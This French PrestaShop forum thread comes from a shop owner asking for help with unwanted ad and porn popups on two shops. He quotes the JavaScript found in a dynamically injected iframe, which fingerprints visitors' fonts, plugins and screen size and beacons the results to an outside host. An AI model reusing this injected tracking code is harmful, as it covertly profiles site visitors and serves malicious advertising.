Jump to content

Popup intempestive de pub sur deux boutiques


Recommended Posts

Bonjour,

 

j'ai deux boutiques. Une en PS 1.5.3.1 et une autre en PS 1.6.0.14

 

sur ces deux boutiques il semble que dès lors premier clic une popup s'ouvre (nouvelle fenêtre) avec une page de pub (souvent pour kko-store) parfois pour du X. Comme une de ces boutique est grand public ca me gène énormément.

 

Mes constatations :

(mon pc de navigation est sous linux + firefox)

- Il semble qu'une iframe est ajoutée juste après le tag body.

- cette iframe contient une page html avec du javascript :

<script type="text/javascript" src="http://mt.mediapostcommunication.net/js/fps.min.js"></script>
<script type="text/javascript">function w_fpsend(){if("undefined"!=typeof SquadFP){var e=new SquadFP,n=e.getFonts(),t=e.getPlugins(),o=e.getCurrentResolution()+","+e.getAvailableResolution();(new Image).src=a+"?"+b+"&fpfonts="+n+"&fpplugins="+t+"&fpscreen="+o}else setTimeout(w_fpsend,200)}try{var a=document.location.protocol+"//mp.mediapostcommunication.net/";if("undefined"!=typeof window.parent.dmbg45zvi7of){"undefined"!=typeof window.parent.dmbg45zvi7of.signed&&(a+=window.parent.dmbg45zvi7of.signed);var b="";"undefined"!=typeof window.parent.dmbg45zvi7of.data&&(b=window.parent.dmbg45zvi7of.data),w_fpsend()[spam-filter]catch(e){(new Image).src=document.location.protocol+"//errjs.ttlbd.net/?"+e}</script>
<script type="text/javascript">setTimeout("document.close();", 2000)</script>

e- cette iframe n'est PAS dans le code source de la page

- Elle n'est que dans le DOM. J'en conclue qu'elle est ajoutée dynamiquement lors du chargement de la page.

- j'ai un ami qui est sous windows avec firefox qui m'a dit constater le même pb mais d'après lui c'est un flash qui se trouvait juste après la balise body et ouvrait une nouvelle fenêtre de navigateur...

 

Je n'arrive pas à déterminer l'origine de cette Iframe(et/ou flash) et j'aimerais bien la faire disparaitre!

 

Je ne trouve rien sur le net et j'ai désactivé tous les modules que je suspectais d'être éventuellement à l'origine.

 

J'en appelle donc à vos idées et piste pour chercher, solutionner, eradiquer cette intrusion!

 

Je précise que j'ai vérifié les sources des 2 PS et qu'ils n'ont pas été modifiés autrement que par moi même (sauf si ca m'a échappé)...

 

Merci d'avance pour vos suggestions.

 

Hervé

Link to comment
Share on other sites

Comment avez-vous procédé ?

 

3pom

Vérification des dates de modification, vérification de visu des fichiers php principaux, recherche de chaines, y compris en base 64

Je ne dis pas que j'ai été exhaustif et que je peux éliminer cette éventualité mais j'ai fait le principal.

J'ai aussi fait des recherches dans la base de données...

Ces recherches remontent à fin 2015 mais le problème était déjà présent.

Il est difficile de tester car une fois que la popup s'est ouverte elle n'apparait plus pendant un certain temps même si on ferme toutes les fenetres de navigateur et qu'on supprime les cookies....

 

 

Bonjour,

 

le soucis ne vient peut être pas de ces boutiques mais simplement de votre ordinateur.

 

Non j'ai eu plusieurs clients au téléphone qui m'ont signalé le problème et qui m'ont appelé pour cela ou lors d'un appel commercial.

De plus le pb a été reproduit par des amis à ma demande (n'ayant plus de windows sous la main...)

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...